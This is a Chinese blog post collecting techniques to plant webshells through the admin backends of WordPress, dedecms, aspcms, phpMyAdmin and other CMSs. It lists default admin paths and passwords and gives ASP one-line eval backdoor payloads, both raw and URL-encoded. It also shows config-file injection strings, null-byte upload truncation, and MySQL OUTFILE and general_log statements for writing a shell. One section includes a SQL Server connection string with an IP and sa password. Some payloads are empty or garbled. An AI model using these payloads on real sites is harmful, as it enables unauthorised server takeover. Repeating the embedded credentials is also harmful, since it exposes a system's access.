常见的CMS后台getshell姿势总结

目录

WordPress

dedecms

aspcms

南方数据企业系统

phpmyadmin日志

pageadmin

无忧企业系统

WordPress

默认后台登录地址

/wp-login.php   /wp-admin

登录后在外观的编辑里面找一个模板，我们在404模板 (404.php)里面写入一句话后门

可以蚁剑连接

上传一个压缩包主题，压缩包里面有一句话木马，网站自解压后我们可以getshell 

dedecms

默认密码为admin admin

系统默认管理路径是dede

在后台的文件式管理器上传后门,目录uploads/1.php

在主页模板里加上PHP代码，然后在更新主页HTML中将首页的文件名后缀改为php

通过广告插入PHP任意代码，目录是/plus/ad_js.php?aid=8

注意这里不能将cmd通过引号括起来，因为会被转义时添加\导致getshell失败

aspcms

默认登录地址Admin_aspcms

ASP 文件通常包含 HTML 标签，就像 HTML 文件。然而，ASP 文件也能包含服务器脚本，这些脚本被分隔符 <% 和 %> 包围起来。

第一个getshell的地方是幻灯片，内容会保存在配置文件\config\AspCms_Config.asp里面

bp抓包修改slidestyle为99，在配置文件里面成功发现修改成功

闭合前面，并写入一句话木马

1%><%eval request(chr(35))%><%进行url（key编码）

1%25><%25eval+request(chr(35))%25><%25 

南方数据企业系统

常量设置内加入后门

在目录\Inc\Const.asp

添加新闻处通过00截断上传文件（%00通过url解码，并且将文件填充大量无意义的字符以达到正常的文件大小防止被限制）

连接蚁剑

将网页信息中的联系邮箱改为下面的代码

smtp.163.com"%><%eval request(chr(35))%><% s="

Const JMailOutFrom = "smtp.163.com"%><%eval request(chr(35))%><% s="" 

虽然报错500，但是仍然能连接上webshell

phpmyadmin日志

用into outfile 把后门写到网站目录上

select '' into outfile 'D:/www/a.php'

利用 mysql 日志文件写 shell ，这个日志可以在 mysql 里改变它的存放位置，登录 phpmyadmin 可以修改存放位置，并且可以修改它的后缀名。所以可以修改成php 的后缀名就能获取一个 webshell

SET global general_log = "ON"; 日志保存状态开启；
SET global general_log_file ='D:/WWW/a.php'; 修改日志的保存位置。

此时目录下创建了a.php文件,我们通过查询将一句话写入日志文件，写入后门后可以getshell

select '';

pageadmin

默认登录地址/admin/login/

上传含有webshell的压缩包，解压后得到webshell 

目录管理器 查找web.config 里面有数据库的连接信息

用菜刀远程连接SQLserver192.168.10.142  _H6psv8Fmr2C7mvsF6qkGnE 

ADO
Driver={Sql Server};Server=192.168.10.142;Database=master;Uid=sa;Pwd=_H6psv8Fmr2C7mvsF6qkGnE

无忧企业系统

1.修改白名单后缀，然后直接上传脚本

2.普通用户留言，后台回复

┼ 攠數畣整爠煥敵瑳∨ ≡ ┩ 愾

访问数据库的目录，webshell的密码是a

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！